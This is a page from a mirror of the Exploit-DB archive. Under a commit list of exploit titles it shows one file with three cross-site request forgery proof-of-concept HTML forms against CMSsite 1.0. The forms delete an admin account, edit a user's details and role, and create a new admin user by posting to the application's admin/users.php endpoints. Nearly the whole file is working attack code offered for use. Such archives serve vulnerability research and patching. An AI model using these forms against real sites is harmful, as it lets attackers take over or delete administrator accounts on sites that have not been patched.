bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/46480.txt
Offensive Security a37e3008e5 DB: 2019-03-05 
20 changes to exploits/shellcodes

Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion

FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation
STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)

symphony CMS 2.3 - Multiple Vulnerabilities
Symphony CMS 2.3 - Multiple Vulnerabilities

Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities

Raisecom  XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution

zzzphp CMS 1.6.1 - Cross-Site Request Forgery

Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)

Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)

OOP CMS BLOG 1.0 - Multiple SQL Injection

OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery
CMSsite 1.0 - Multiple Cross-Site Request Forgery
elFinder 2.1.47 - Command Injection vulnerability in the PHP connector
MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal
Bolt CMS 3.6.4 - Cross-Site Scripting
Craft CMS 3.1.12 Pro - Cross-Site Scripting
WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities
Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting

Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)

Linux/x64 - Kill All Processes Shellcode (11 bytes)

Linux/x86 - iptables -F Shellcode (43 bytes)
2019-03-05 05:01:50 +00:00

149 lines
No EOL
4.3 KiB
Text
Raw Blame History

# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<!doctype html>
<html>
<head>
<title>Delete Admin</title>
</head>
<body>
<form method="post" action="http://localhost/[PATH]/admin/users.php?del=1">
<input type="submit" value="Delete">
</form>
</body>
</html>
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Edit Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<!doctype html>
<html>
<head>
<title>Edit Admin</title>
</head>
<body>
<form role="form" action="http://localhost/[PATH]/admin/users.php?source=edit_user&u_id=10" method="POST" enctype="multipart/form-data" >
<!-- You can change u_id value -->
<div class="form-group">
<label for="user_title">User Name</label>
<input type="text" name="user_name" required>
</div><br>
<div class="form-group">
<label for="user_author">FirstName</label>
<input type="text" name="user_firstname" required>
</div><br>
<div class="form-group">
<label for="user_status">LastName</label>
<input type="text" name="user_lastname" required>
</div><br>
<div class="input-group">
<select name="user_role" id="">
<label for="user_role">Role</label>
<option value='User'>Admin</option>
<option value='User'>User</option>
</select>
</div><br>
<div class="form-group">
<label for="post_image">User Image</label>
<input type="file" name="user_image">
</div><br>
<div class="form-group">
<label for="user_tag">Email</label>
<input type="email" name="user_email" class="form-control"required>
</div><br>
<div class="form-group">
<label for="user_tag">Password</label>
<input type="password" name="user_password" required>
</div><br>
<hr>
<button type="submit" name="update_user" value="Update User">Update User</button>
</form>
</body>
</html>
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<head>
<title>Add Admin</title>
</head>
<body>
<form role="form" action="http://localhost/[PATH]/admin/users.php?source=add_user" method="POST" enctype="multipart/form-data">
<div class="form-group">
<label for="user_title">User Name</label>
<input type="text" name="user_name" required><br><br>
</div>
<div class="form-group">
<label for="user_author">FirstName</label>
<input type="text" name="user_firstname" required><br><br>
</div>
<div class="form-group">
<label for="user_status">LastName</label>
<input type="text" name="user_lastname" required><br><br>
</div>
<div class="form-group">
<label for="user_image">Image</label>
<input type="file" name="user_image" required><br><br>
</div>
<div class="input-group">
<select name="user_role" id="">
<label for="user_role">Role</label>
<option value='Admin'>Admin</option><option value='User'>User</option>
</select><br><br>
</div>
<div class="form-group">
<label for="user_tag">Email</label>
<input type="email" name="user_email" required><br><br>
</div>
<div class="form-group">
<label for="user_tag">Password</label>
<input type="password" name="user_password" required><br><br>
</div>
<button type="submit" name="create_user" value="Add User">Add User</button>
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink